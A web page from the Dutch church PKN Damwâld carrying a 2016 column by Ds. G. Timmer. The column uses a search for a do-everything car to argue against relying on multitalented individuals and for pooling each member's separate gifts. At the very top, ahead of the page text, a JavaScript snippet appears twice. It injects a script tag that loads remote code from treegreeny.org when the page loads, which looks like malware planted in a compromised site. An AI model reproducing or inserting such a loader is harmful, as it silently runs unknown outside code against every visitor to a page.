;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Eierlegende-Woll-Milch-Sau - PKN Damwâld

Eierlegende-Woll-Milch-Sau

Gepubliceerd op: dinsdag 8 november 2016

Onze zoektocht naar een nieuwe auto had de afgelopen maanden heel wat voeten in de aarde. Dat kwam omdat we (lees: ik) het liefst een betrouwbare (Japanse) auto wilden. Met een goede onderhoudshistorie, graag een trekhaak, een beetje sterke benzinemotor en 7 zitplaatsen waar ook grote kinderen fatsoenlijk kunnen zitten. Omdat ik na ruim 5 jaar wel genoeg Zafira gezien had, liever geen Opel meer. Ook geen zwarte auto meer. En had ik al gezegd dat het budget maximaal 5000 euro was? Met garantie en nieuwe APK graag.
Onze oosterburen noemen zo’n eisenpakket ook wel ‘Eierlegende-Woll-Milch-Sau’. We zijn op zoek naar iets wat aan alle wensen kan voldoen. De volmaakte auto, het complete huis met tuin. De ideale echtgenoot, een kerkelijke gemeente met alles erop en eraan.
Soms is zo’n wonderkoe te vinden. De speurtocht is niet voor niets geweest als je opeens oog in oog staat met al je gedroomde idealen. Dan is het alleen nog maar een kwestie van een handtekening zetten en de dagen aftellen tot aflevering.
Er zijn kerkelijke gemeentes die alles lijken te hebben. Betrokken gemeenteleden, een actieve kerkenraad, oog voor elkaar, mooie jeugdwerk en solide financiën. Ik moet eerlijk zeggen dat ik de kerken in Damwoude wel op deze manier zie. Wat zijn we rijk gezegend met alles wat er is, kan en mag! Daar komt nog bij dat er diverse gemeenteleden ‘multitalented’ blijken te zijn. Ze zijn voor verschillende taken inzetbaar en doen dat allemaal supergoed.
Tegelijk ligt hier ook het gevaar. Als de verwachtingen hoog zijn, is de kans ook groot dat de realiteit gaat tegenvallen. Als vele taken in de gemeente door één persoon worden gedaan, dan ligt kwetsbaarheid om de hoek. Als die prachtige auto met 7 zitplaatsen niet wil starten, staan er 6 mensen in de kou. De sterke motor zwijgt en je verlangt misschien wel terug naar die oude zwarte Opel die het wel altijd deed.
Het lijkt zo fijn: een Eierlegende-Woll-Milch-Sau. Blij ben je als je er één gevonden hebt. Maar je kunt een slechte dag beleven als het allemaal niet zo blijkt te werken.
Daarom vertel ik graag over iets wat nog beter is: inzet van afzonderlijke gaven. Niet iedereen is ‘multitalented’. Maar wel iedereen is door God ‘talented’. We hebben allemaal onze gaven gekregen. Paulus heeft daar hele mooie dingen over geschreven in 1 Korinthe 12.
Wat is er mooier dan om die losse talenten samen in te zetten. Voor de samenleving en voor de kerk. Kunnen we elkaar op deze manier niet prachtig helpen en Christus dienen?
Zoek niet langer naar de Eierlegende-Woll-Milch-Sau. ‘Multitalented People’.
Gebruik die tijd maar voor het zoeken naar afzonderlijke talenten.
Dan heb je niet één ding op de oprit staan, maar dan staat je hele erf vol!

Columnist:Ds. G. Timmer

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns